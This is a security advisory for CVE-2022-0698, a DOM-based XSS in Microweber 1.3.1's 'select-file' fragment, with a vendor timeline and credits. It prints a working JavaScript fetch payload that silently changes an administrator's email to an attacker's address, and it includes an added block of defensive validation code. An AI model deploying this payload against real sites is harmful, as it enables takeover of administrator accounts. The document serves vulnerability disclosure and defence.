Microweber 1.3.1 - DOM XSS to Account Takeover

Summary

Name: Microweber 1.3.1 - DOM XSS to Account Takeover
Code name: Garrix
Product: Microweber
Affected versions: Version 1.3.1
State: Private
Release date: 2022-09-19

Vulnerability

Kind: DOM-Based cross-site scripting (XSS)
Rule: 371. DOM-Based cross-site scripting (XSS)
Remote: Yes
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSSv3 Base Score: 8.8
Exploit available: Yes
CVE ID(s): CVE-2022-0698

Description

Microweber version 1.3.1 allows an unauthenticated user to perform an account takeover via an XSS on the 'select-file' parameter of the following URL: http://cbelloatfluid.com/admin/view:modules/load_module:files#select-file=http://cbelloatfluid.com/userfiles/media/default/ovaa-checklist.txt. It is possible to obtain administrative accounts through a malicious link.

Vulnerability

The XSS present in Microweber 1.3.1 allows an unauthenticated remote attacker to perform an account takeover. To trigger this vulnerability, we need to send the following malicious link to an administrator in order to hack their account:

In the PAYLOAD field we will put the following malicious JS code:

fetch('http://cbelloatfluid.com/api/user/1',{
    method:'POST',
    credentials:'include',
    headers:{
        'Content-type':'application/x-www-form-urlencoded;charset%3dUTF-8'
    },
    body:'id%3d1%26_method%3dPATCH%26username%3dadmin%26email%3dattacker%40fluidattacks.com%26phone%3d\r\n'
})

Exploitation

To exploit this vulnerability, a malicious URL must be sent to the administrator of the Microweber instance. Once the administrator opens the link, the injected script changes the email address associated with their account to one that is under our control.
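The root cause is a value taken from the URL fragment (`#select-file=...`) reaching the DOM without validation. The following is an added defensive example, not Microweber's code: it parses the fragment, accepts the `select-file` value only when it is a same-origin URL under an assumed `/userfiles/` prefix (matching the legitimate URL in this advisory), and renders it as text rather than markup. The origin and prefix are assumptions for illustration.

```javascript
// Added example (not the vendor's code): safe handling of the 'select-file'
// fragment parameter. Assumption: legitimate values are same-origin URLs
// under /userfiles/, as in the advisory's example link.
const ALLOWED_PATH_PREFIX = '/userfiles/';

// Parse "#select-file=..." and return the value only if it is a same-origin
// URL under the allowed prefix; otherwise return null.
function parseSelectFile(hash, origin) {
  const params = new URLSearchParams(hash.replace(/^#/, ''));
  const raw = params.get('select-file');
  if (raw === null) return null;
  // Reject anything carrying markup characters before trying to resolve it.
  if (/[<>"']/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw, origin); // relative values resolve against our origin
  } catch (e) {
    return null; // not a parseable URL at all
  }
  // javascript:, data: and cross-origin URLs all fail this origin check.
  if (url.origin !== origin) return null;
  if (!url.pathname.startsWith(ALLOWED_PATH_PREFIX)) return null;
  return url.href;
}

// Hardened rendering: the fragment value never becomes HTML. `container` is
// a DOM element in the browser (any object with a textContent field works).
function renderSelectedFile(container, hash, origin) {
  const file = parseSelectFile(hash, origin);
  if (file === null) {
    container.textContent = 'No valid file selected.';
    return false;
  }
  container.textContent = file; // text node, not innerHTML
  return true;
}
```

In the browser this would be called as `renderSelectedFile(document.getElementById('selected-file'), location.hash, location.origin)` (element id assumed).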


Our security policy

We have reserved the CVE-2022-0698 to refer to this issue from now on.

System Information

  • Version: Microweber 1.3.1

  • Operating System: GNU/Linux

  • Web Server: Apache

  • PHP Version: 8.1.9

  • Database and version: MySQL

Mitigation

An updated version of Microweber is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

References

Vendor page: https://github.com/microweber/microweber

Timeline

  • 2022-09-05: Vulnerability discovered.

  • 2022-09-05: Vendor contacted.

  • 2022-09-19: Vendor replied acknowledging the report.

  • 2022-09-19: Vendor confirmed the vulnerability.

  • 2022-09-19: Vulnerability patched.

  • 2022-09-19: Public disclosure.